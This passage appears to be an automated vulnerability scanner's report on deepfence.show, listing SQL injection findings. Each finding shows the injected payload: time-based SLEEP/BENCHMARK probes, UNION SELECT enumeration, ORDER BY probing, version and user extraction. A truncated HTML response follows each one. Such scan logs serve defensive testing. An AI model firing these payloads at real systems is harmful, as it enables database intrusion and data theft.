src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1454\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1455\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1456\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \nNULL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1457\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1458\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1459\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1460\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1461\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1462\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or benchmark(50000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1463Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1464\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1465\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1466\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1467\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk 